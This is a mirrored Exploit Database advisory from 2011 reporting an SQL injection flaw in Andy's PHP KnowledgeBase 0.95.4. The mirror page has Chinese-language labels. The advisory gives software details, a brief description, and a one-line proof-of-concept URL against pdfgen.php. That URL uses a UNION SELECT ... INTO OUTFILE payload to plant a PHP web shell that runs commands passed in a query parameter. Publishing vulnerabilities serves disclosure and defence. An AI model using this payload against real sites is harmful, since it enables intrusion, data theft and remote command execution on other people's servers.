Andy’s PHP KnowledgeBase 0.95.4 – SQL Injection

• Exploit Database
• 133 阅读

• 作者： AutoSec Tools
  日期： 2011-03-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17061/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24

  ------------------------------------------------------------------------ Software................Andy&apos;s PHP Knowledgebase Project 0.95.4 Vulnerability...........SQL Injection Threat Level............Critical (4/5) Download................http://www.aphpkb.org/ Discovery Date..........3/27/2011 Tested On...............Windows Vista + XAMPP ------------------------------------------------------------------------ Author..................AutoSec Tools Site....................http://www.autosectools.com/ Email...................John Leitch <john@autosectools.com> ------------------------------------------------------------------------     --Description--   A SQL injection vulnerability can be used to extract arbitrary data. In some environments it may be possible to create a PHP shell.     --PoC--   localhost/aphpkb/plugins/pdfClasses/pdfgen.php?pdfa=&apos;and%201=0%20UNION%20SELECT%20&apos;<?php%20system($_GET["CMD"]);%20?>&apos;,&apos;&apos;%20FROM%20dual%20INTO%20OUTFILE%20&apos;../../htdocs/shell.php&apos;;%23